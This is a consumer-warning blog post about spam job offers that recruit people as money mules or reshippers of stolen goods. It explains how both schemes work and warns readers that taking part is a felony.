I have no doubt that my readers are also seeing more mysterious online job offers arriving by unsolicited email (spam). With so many of us struggling to make ends meet, in a middle that keeps getting farther apart, some of you may be tempted to reply to such an offer. Please don't do it! It is a scam and will get you in big trouble. Let me explain...

Work at home job scams have been around for well over a dozen years. In recent years the people running these scams have found that it is more profitable to recruit hapless individuals, in desperate search of a job, into a money laundering, or stolen goods reshipping scheme, than to cheat them out of a few dollars over a fake envelope stuffing, or medical billing position.

What is a money mule?

A Money Mule is a person who knowingly, or unknowingly receives stolen, or illegally obtained funds, allows them to be deposited into their own bank, then transfers that money from their bank to another one, located in another country. This act is known as Money Laundering. The illicit money comes to them by means of the use of banking key loggers, like the Zeus or SpyEye, or by illegal activities like arms or drug sales, or extortion. Sometimes, the money being laundered is done so on behalf of known terrorist organizations.

What is a reshipper scam?

A reshipper scam is where a person is recruited for a job where they receive physical goods delivered by the post office or a parcel delivery service, which they repackage, or re-label, then reship them to a specified, foreign destination. The reshipper may or may not be aware that these goods were obtained with stolen credit or debit cards.

In both of these "job" descriptions, in most civilized, law abiding countries, serious laws are being broken by all participants in these schemes. Money Mules are easily tracked down when victims notify the Police about money illegally transferred out of their bank accounts. The banks have a money trail for all money transfers. Most Money Mules are told to set up a direct deposit account, to receive and transfer stolen funds. As I mentioned earlier, this is known as "Money Laundering" - which is a Federal Felony in the USA and Canada, punishable by lots of time in a Federal Penitentiary and huge fines.

Reshipping job participants are involved in moving stolen merchandise (from auction sites, office supply, computer and electronics stores, catalog stores, etc) to offshore recipients. All reshipping mules are guilty of felonies for trafficking in stolen goods.

Continue reading "Work at home Money Mule job scams abound with holidays approaching" »

Posted by Wiz at 11:43 AM | Permalink

back to top ^